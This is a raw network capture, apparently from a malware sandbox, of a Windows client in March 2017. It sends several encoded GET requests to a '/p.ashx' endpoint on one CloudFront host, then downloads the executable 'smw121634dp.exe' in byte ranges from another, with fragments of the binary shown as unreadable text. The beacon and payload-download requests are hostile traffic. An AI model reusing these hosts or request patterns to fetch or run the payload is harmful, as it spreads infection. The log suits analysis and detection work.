Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: p5ELyWwKmjomEc2poXe2ugCS9kADtTjf7A5aNO6KYijkZhmOQNlnkg==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:57 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 3ccfbae98f5816b531634c1e82e452

59.cloudfront.net (CloudFront)..X-Amz-Cf-Id: p5ELyWwKmjomEc2poXe2ugCS9

kADtTjf7A5aNO6KYijkZhmOQNlnkg==..

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquvcTB46xWnxTle2fwOdHS0Y4G r 3F6T7bkBEy9Iv l4= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: kH9M4ekPufriambI8C0A_aLFK1VYvCRfBp-wq3vJiPyl1FtCKAtS_A==

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqujsg/omkWbCTQlB3kfGAhd0M7 7p6G3XAOQeYuSCl878AKo0mRYbtZmTrdmoQBtHVvQShiKWZ9cFEj3apiqwElP87VSn8EQRfyltSMgrsTyl8aUSP2VoumlpLPC 4XcIm7cGFoGtp5ECS7IK1ett99MZ5kXJQtKy834mgW150Op0Y6r6EQu3En4ua1g4fVI4GJA9YFpnE8QO8567A9PF2tojJydmmwDtH8qBHSjX/hDYPr3Ugg3/8WtyvhlGeipNV537D3i/QmJNPHtdPmcrksKcwUL4uIo9bBcP67p/rswd0aUeoU PGdmwVVPh7TxXkBCDWG0W34WuMrG6DH6H0HA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 0S8KGBuGMkqPy9cBQgxTzAdiRAmoEFbFBGUTLOwoi8dlWjrJo4koLw==

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqubz0XqPn9zR0IiyFlsxNmPbPiCC4paVhdpvBRerX5l2CaTGmM9zHPWA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 2YXlRet6tnFPhmM98-RqzfUyCCRYZV4i7Xhs_vNWHDiRubY12AoB8Q==

....

GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pM6gKn8h0qT3aBcaoZob0e9Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: oTTUpjh13vBM9R7uL1lLXiaPfuN6_O8D5L81ndXQn8Dj5Aee-_I0EQ==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:58 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 3ccfbae98f5816b531634c1e82e452

59.cloudfront.net (CloudFront)..X-Amz-Cf-Id: oTTUpjh13vBM9R7uL1lLXiaPf

uN6_O8D5L81ndXQn8Dj5Aee-_I0EQ==..

....

GET /p.ashx?e=043Mckb8Lnhw7iCtSAyu/ QhfXa/CCW5NPZS6pZIlAEr4Spdf2ZexL9An1YluClXsGG6qLQR8LceI9VTThLJ3UlF4mqrDXF/L3OhFAPbRTejORB6u31KNxKv6VolbFNDUxX212nyBDAafyyUl C9vORgvLZHT a72UC/bfWIAgSqinVSQQ1bE6yLXK7ul6nZPXUNd68JXUDrKwD6t b1ZfKiWnlKjT8nQI8HtM9wp5Tx0cXu7AB1uimF904v4t2DIApimWCrqakt3bH6c7GAHITnquSe8GwjLnPqEPf2/rl3s8pSKbhxWudjDabjiU15bfhBVTXmVIKy2EBoQQl304tsVuXqTBm48VmE3ZuCJs4y1aJnkp ScdBb0CbA7Wqcrbq8YHwKZS4RrSPwflTyFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: FLVgKiMRIXIw65z1htvDBY1YfN1U0R9J56DzZNT16K0TYEc46BPLLg==

GET /smw121634dp.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:01 GMT

Content-Range: bytes 0-249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: B-NB4C4upWTh9sx666RTwKjdFQiz_aRLPfClxajzrzhk1p5aClqPpg==

[email protected]......

..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i

u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....

oS.................\[email protected]

........a.4......................................s..........`B........

... 3.(............................................................p..

.............................text....[.......\.................. ..`.r

data.......p.......`[email protected]@.data................r..........

[email protected]`[email protected]`B.......D...v

[email protected]@....................................................

......................................................................

......................................................................

......................................................................

......................................................................

............................................U....\.}..t .}.F.E.u..H...

[email protected]@[email protected]

..}[email protected] M.......M....3.....FQ.....NU..M.....

[email protected][email protected]

....E..9}[email protected]}[email protected]@..vXW..

[email protected]<[email protected] [email protected]\[email protected]_

^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G

.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:03 GMT

Content-Range: bytes 250000-499999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 8cGGfGwRI8B_IL6HDaIf33fRLi4ZrMwjjwHxMeiWT0NKu6xAGBAn_w==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:03 GMT..Content-Range: bytes 25000

0-499999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 7922e01ab53e

8f36477272573223ab35.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 8cGGfGw

RI8B_IL6HDaIf33fRLi4ZrMwjjwHxMeiWT0NKu6xAGBAn_w==...ny.q..{k..........

.U....j..0[...2.......;\..L.....T.Q....Z.^...$A..s..)O|...u$....}.{q..

..j.....c....|$.~..k.x...z...K..C^#.....! 8.].!th..p......L...\.=K.m..

-.h.L.........w~...X..M....[..S.{. .ek3.VeR..Y.^.QaR..C...[t(..i^.N6..

.j.O.YGs.<)...x.x...Y....R....'.7..rt.].....d..A....[sym?/...T....w

h.......`.ww...kO.T.i.ep4O!....T.f.K.[..T.5...;.K...?...W...n\..a.'.t.

[email protected]=Q.....<[email protected]@iw3}BEi.).=\."Mm.>T.eL.....~...

.r..;[email protected] ..Qu.......rP.U...s/*.[..i..j..!.*..u.H...GX....O=..V..

..m.lc.....E.][....>[email protected]&D..n.B)....db.=..7..Q....g...<....

?..ipU...\.F.Y.......K..9.......C........M_.Z_<.R6.......nO.....y.L

.Q...K.R";.|.........r.%..j4.1.N... [email protected]).*.>.H~N....8..r{M..

.w.....S0../..s.\...}..w.~...b;.Sw.L0.;D....Z N.E......2.B.6(....X..UZ

[email protected]:3n.S...U..9. .jZ0U....O..v.........":j*..^~...............6.....

..i%.. . o.8..|.....tS).E..g.h#.O..#..\....L,.:..c.....1._'. ./.Z..g.v

]:.8xs.o.1....q..l..;....t..ZW....B..........rM......G......S.....

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 750000-999999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: xv60FsoCinZiXNy8Zd2f8DEi2-0SNRbuelKIwqOuswlbv7_QTYlp2w==

;..M..........H....V......\.........l1-.%...z....NF.......0... .e.2...

..F..>d.[.....v..TLN..%...G4...?.6..*<Y.O2...\&GNH.].4o...f.^o..

..g1L..?`......*......R......v.;a;E...Tm......P\~f.......X.:....\[email protected]

[email protected]].>.....=..`....T.cE.G.....U..l6..0....2....jH.&...wY..1

.zVn.T.R\.).*..nZ...m4....[.&5...V......j.....!.4..Np.......M.<[email protected]

..H|.'b......O..R....K...(V.kI..(S\...Q.Q.M......n.Q.<..3....s.j.b.

.....,.....f..n.LH..%.&PT KWK4....b}.'K..,L...)......u..."..}i....z...

..1b.S.i.K....)E...u.M...c%[email protected]&..

.2.3....*..<p....MM'[email protected]%.

............p...i..#.T..._./q.A.B.......1.........(.(.$!.i[./[email protected]$T.

.b..b....\a7...5=3...!..:Z.[s.KBY....,.........P.|.}[email protected]|..]...#..

..8W..]...s....q..f{NA..>[email protected]#...=.S.j(A......1..;.F.*.M. .^_s .x.D

%...x.:..6.%.<..K.f.SW..o..=.A...|.&.0..(.D$.eb7[9m=7}.0......km.|.

"7..K ,.8.6.Ai..6.?.....mf...8 .Rl.wj.....,..d.k...6.f.R:..4/1.=...xp.

....9r1.K..z.j.W8.....$....."..E..(.c.B.^..r.??..c.B..cfp...z........d

..-........f..bP"K.=...9lJ1...|n...;Y_r\...{.Bw.)...&[....~..7....y`[.

.r....i..!...........7C.~..../y...B....^...._.;..N....Y=.tUYU6..hX..o.

.2.9......3"[email protected]^/\H..s....!%...y...ST.{...U....a..h

}N..7.(.V...Fy.....Ufu0.g]fOd.BX/...W......P....i$.f.\..h=.1....^..erB

........a..1U....5Q.T.c...x... ......S.z......Ep...`...-E.. I......uJ[

.1.O.>..t..5.............z.........8...2Or./..&..M....V7R..........

[email protected]_....h.:e..aOd7...V.a\.J..o..TQ....t.RY..f0...R..'....4.....

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 1250000-1499999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 5qszbFpfEM6_n_SHqnSua2dClwcYhoalNqftFuUXQXLNifKQ_LQnmQ==

j..8|..R......4....I.rw..*V.....X.........&.|.D'.d..)2..#...e....R0.i.

....580.n=..o....I...q.U.4.o"F.....2J.A..P...0..b..q.Rz.}....n..5.q.."

..7.....B...T...Q...Go..Z`d.E..B.G....CY...Q._Pb.A...5.[......\../W_}D

.}..-5P...=...|..%w{...........Y.T,.H..J.1..~D..f..g...|[email protected]

G.2X.*......3..fpv.]A......].{.E.X..h.Cu ^@.$&.?Z....G_.......M.q...Pv

.......aa..i9k'd....W......c....P;;.......}%...r....r...I.UE(.......N\

...VV~..c...w........>...,.l...*.4...........ye...qD......t ...>

[email protected]^..M.....{.....\E.z....s.e....n..1.}..^..V......:H.A.!..i|.

G'@....%[email protected]'#..dI..Jy`.9..'5..Fj.....F.j[..;.s...]..P...5...W..

..\.>.|f.?.............!.......|B.q...w......*..B...x,];./..m.}..kl

.L..>>\...ml&..fO.X.Ue....2....S....{.]k.Q..s.].....^..Jj..../.b

`[email protected]>.8.={...v.A.w....(._..T..l.J...AgC.....T.....R.

.V ....IX&.!..g....Y0.......%...R..Tm.( ....AI......_.D..||.*./..<.

5....}...JC.".....J......Uq.A.-..J*..P.V...x...C7....]. [email protected]?v.

q.]d!..=...3....V.Zv.oT..c...d..q.&..rP...l:......a9;.j..........f.3..

.AC...w..E.tPS..~...[.{.,&.\.r$&......-s.......A../..l...9..[n......5.

R<Y.q.......r..$.UH(.pw..Ob.N..Q...,W0. D{l;...j.W.^.(..)gg.?....Z

.....8R.h......4]Q.g{0q...PZE^..sL..-Zx.v......k"...e=.(?.<.m......

O0.K.aY......u.<.&.O.iX.x..=.]S..$)....q......7...h;.....f....*O...

.x....N.gP.KA..`..X.M../...........MCZ...4..........M.....h....xx.D&.

E.\I...Kvr.nn..l.v.c.nqd..] t..!...4....]...{O..O...-jO....*.C...;h..*

<....Q.r.F\..#C...H......~.|...r...{.....2.?....?.J).........Z}

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 1500000-1749999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: A1qcf8jMm6EfdnLBl4pfkuyLfq9M7Uqf5dGsKlmAbbga_l7uEdSQdw==

.;%[email protected],...:Ql.....6..Z....7..(y".X...

....r.....1X;....2B......;..Q.w.Y..T1....i.j...D<.}...]...4.....4{.

.C.\..>.8r....w|./....{.R....(EcW.p5?$.u.-T~u..x.....vL....'..C.jW.

H....S.........D4_U..{..P.{.^.g...)t.....%.Z.z..}..Q-...y.T...5}..Y..8

.CL....q..2. )D".J.....T".!<bITGCR......EI...#...].$.n..}q.#.t..3.F

.....:.I.0y.hV.V4...|aE.y..]Jn..7...<E$.L.?XS...si..az=...# t...w..

dkJ..|....9.>....l....yX..9.<.e......L.rC1....e.}<.~..bT..M.h

.FFuuF.a..?X....C..{....v..`..}.i..........`..{.:.G..._.$KS..vu.... "H

./..D...../..........C.....>...|[email protected]!...iR.v.....

`..h....|.......l......1..n...(I.......vLX.S..nN..<.......B.`Io.XR.

..[.Qs..Mp...'a......R..\.N..j..y.....3.H..P...^j....5..U.....P.o.X.jo

.......3..Zw....1............y/"...e.X.a...Q'^9m..Zm(D8...P...#E`..^).

."...Sm...N06..f.V......w...2......r.,..4....{.....<..y...7..i.....

[email protected]&....rU.&...kC..#.._.t'r.6..i.......P...w..'0".Z...

7...D7M.Q.6.f#.......;.<1.=.D.q....o...7G.....R..%n...{[email protected]'

M.qV."n\,..7..N=V...)... .bY...........X...i.B.....;E..H'..P.UH".V...y

....{n...M....q.}.O...F5 .....E.F..../....z......8...X....X...b. :a._.

IG..,...k..{..."!v.a..p:..s.P..>[email protected]}. *}

..4\..u8'..`....f:....qK..?.......3.#...&z.NM......>...}........6-/

.R<.I..t,.*2a.Ld<.s. ....r......`0..*..$.iWdu.X.dA...8......XD}.

..~uJ..`x.]S........_....%..D.o.w....y...n........O^..QH..%...PF...._.

..l.....W........u..U..1...e..z.'B22...7I...P.A.s.<[email protected]^.y...4

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 1750000-1999999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: O60HVq8xryQtoELtUxkF8_4apIxdbPGzEchY3NXfaSwuRUB2_efYeQ==

Tu..r..S...}....8..!....*..S?}.w.T.*8.......<...P..YQ......,X......

.BWC....`.J|... .......2..y].......Ds...x..^...b..,......z..]..wx.....

<...jn.R..o......W`.....'3H9....;....4..o.I....tK.fy..C.<...g...

..[..c.).".m..)....s......Z...j....v.5. .f.oF...&S.....G.-.~.\....c..^

.B.a....p.......K`..Fe..Z|..y. ..jp........0...... ..........J7..5..x.

N......N.... ....R.....Z.b....... ..N.W.....b.p.......pe.S...1.v9..1.m

[email protected]^[email protected] ........B......V..2..}.<.^.R..1"....

c..W ..%4....'l5&[email protected]=.=.1.R...#..2

[email protected] .W.B.f....

~..=Z...iEL...v~M...)....g.M..680....p..7.`a.....P.fVsN0.^k...h.8.qh..

.7.4........t..z...!..u.6...%..R...<..;.}Y..p....K|.........x?..,.#

:L....'O*..P.}...3d^..-?....u...L..{{.(.f.]..vptU`...../......>..3.

n7.o_....b. .GE^..i.IR.:.S....'..........q...m...._.T..l..R.....2..'..

m.....`..X....(....v1.c..........d.bm.\.........`.E;[|..%%e.m.....jUZ.

..n....! .{4t(u...<...>0G....Ub`.T......B...x.....Q..-s.{....,J^

e...1.]..56...9/4....)c.4z*~.GO%>T..5.3^....)....xvP....^40.;...J..

.!.9..G..UMx..d...a%.*.,..%8......}.V......! .`....N. s-...u.....R..1.

.......Qg.\E<..9'.....R...F..L.c..k..xq< #..ss..d.f.&..|..a..,..

IT............y...o$.&f..b.~%..TI..]@...~....|Q.'U.Z.o.{.!.K.!...<.

0......MX/...nP.R.LxL.-.wO...r.U..G.......>.......&..H.....C.-\..H.

..q...T&.5"....#m....&p.....B..,.{....,..%.4>7./...9.nf...#.P..y...

.<.H...A...fP,....J9[.......f'[email protected]].U..

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 2250000-2499999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 61z2GHNcv2SJ3EZCGA9l_0zla_R829QyYR1XaPZy4XAvFw6c-lfzJA==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:07 GMT..Content-Range: bytes 22500

00-2499999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 7922e01ab5

3e8f36477272573223ab35.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 61z2G

HNcv2SJ3EZCGA9l_0zla_R829QyYR1XaPZy4XAvFw6c-lfzJA==...g$.X.#..2.u&..r.

Q-.......r.=..$....J.....1M.#uQ$..M.XCe..K9Jk].w\.:. ...c.....\.......

....{.s.E}-o.|..KC{`..D.=.....5..S........ .c_-..yN.6.U........4.....w

....)[email protected];I.>.......7. j...n...cjD.cs..(.....D.

.........n....(.mc!..=......$.........a...CPaw,r.*....}.V..n...E..oW..

l...b.....:o.7&.(............)...H...=.R......5..woY..O1..[.%1.}.. .Yq

_....Q..Y.8.I.....)..WU23m....(iMJc.".8^.<.e.S.?.D.6. ..m$K..a.....

G....c.Y.......F.A.DuEP....<[email protected]$.|

"...:..W...a....<...qq....S..,-.5O2"%-....Uah..2.......dJ..|Q....r.

.`C.,....Wp.]...S....tX;D....sP`B..]..0..Zq..SF.....<r.T.6(?..-..qK

~j`...........at....{.^.....N..b....MO.M....t1..B...sj".......Hrj.|..y

j^.Fq?xJ...;..d...0h}<].R.0......p..k...w.a:.A....{.z.AN.%?5.}...\*

w|/=s....T...n.v.&...}.Z.sf0.u,Ls.....R.BS..v.$Ao$...$.'.kh..)@....j?.

.2d..R....j3]x..js..nQ_EO.u..Vt..(..m.....[.0...=..xzfa.._W.0!{.....9?

..e&.....e..YB.jG<..q Fc.N..C%*......../...c..G.ab.6.......U.C.

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:08 GMT

Content-Range: bytes 2750000-2999999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: PbnrUwqUApr6PQSXhWpG9mCaD8OZ9r3J7nW8I5ZDgeRhArGZtOc_dQ==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:08 GMT..Content-Range: bytes 27500

00-2999999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 7922e01ab5

3e8f36477272573223ab35.cloudfront.net (CloudFront)..X-Amz-Cf-Id: PbnrU

[email protected] <.....

&*[email protected]&CJ?..,....\....j..~&P..,p..l1....ssI..`..b9....#....cu

.....,..iWQ.....feG7..n.E,...yq..Nn....JUK..j......D.......X.R...Q...m

P.)...4.5.(....h.i...d..].c..#..q8?..K..i......,i...?.q=...z.......w.u

.#.....C1...4...O.8B..B.k...r.....G.......b..a.b4z..W..:[email protected]#&

gt;v..P.5..8.....M.8.......p/.VZ........e}...o-R....8Q.\...4{.3......,

..{..a....R_.........B\.x..J..M...~.AB.n.#.... .....RC..zFm...H..-.;..

..K.T.UR..9..=.%.6.).r0.lYw....)........y...3.......Y...*.Gw..Z0.c....

..S....sX.mA.........Dt?...4....F.o4..5..V..B..5./.4.5.)Z.7..8.m.K.a..

u...$....x......p.....\.;..Qx.%.......&(q..........W .....1[...c.,....

r.H....u..M..G.g...`..?x..<.w.YNe..]'.dWT'!...o.....m.Kf......w.1.3

.HW;... .......{d....U .c.x...1...HS^.qc.t...]a,.<.TOs.Y._....d ..

. 2`[email protected];..i[.1.!.'=.....q..Xz.iQ.U>.....cT

r...dz...8..PK.....9.`....Qug=.0P3.~..ksUg0.....S_m..>..6q0}[email protected]&l

t;-U....{..m<........X]|..n..&.....z.~..kE..9Yy...N..)h...{...&

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=3250000-3359007

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 109008

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:09 GMT

Content-Range: bytes 3250000-3359007/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: I31ccdgXE3qawaG5WkECGySddehcAOPF3r7sbp2_0ec9HAyJnKf0nA==

